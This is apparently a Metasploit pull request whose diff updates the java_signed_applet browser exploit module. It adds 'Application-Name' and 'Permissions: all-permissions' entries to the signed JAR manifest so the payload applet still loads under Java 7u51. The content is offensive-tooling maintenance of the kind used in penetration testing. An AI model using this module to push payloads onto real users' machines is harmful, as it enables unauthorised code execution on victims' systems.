### PR TITLE
Fixed java_signed_applet for Java 7u51

### DIFF
--- a/lib/rex/zip/jar.rb
+++ b/lib/rex/zip/jar.rb
@@ -36,10 +36,13 @@ class Jar < Archive
   #
   def build_manifest(opts={})
     main_class = opts[:main_class] || nil
+    app_name = opts[:app_name] || nil
     existing_manifest = nil
 
     @manifest =  "Manifest-Version: 1.0\r\n"
     @manifest << "Main-Class: #{main_class}\r\n" if main_class
+    @manifest << "Application-Name: #{app_name}\r\n" if app_name
+    @manifest << "Permissions: all-permissions\r\n"
     @manifest << "\r\n"
     @entries.each { |e|
       next if e.name =~ %r|/$|

--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
 
-    jar.build_manifest(:main_class => "metasploit.Payload")
+    jar.build_manifest(:main_class => "metasploit.Payload", :app_name => "#{datastore["APPLETNAME"]}")
 
     jar.sign(@key, @cert, @ca_certs)
     #File.open("payload.jar", "wb") { |f| f.write(jar.to_s) }


### PR DESCRIPTION
Java 7u51 need options in the manifest file for :
- Applicaiton-Name
- Permissions

If they aren't set, the applet doesn't load.
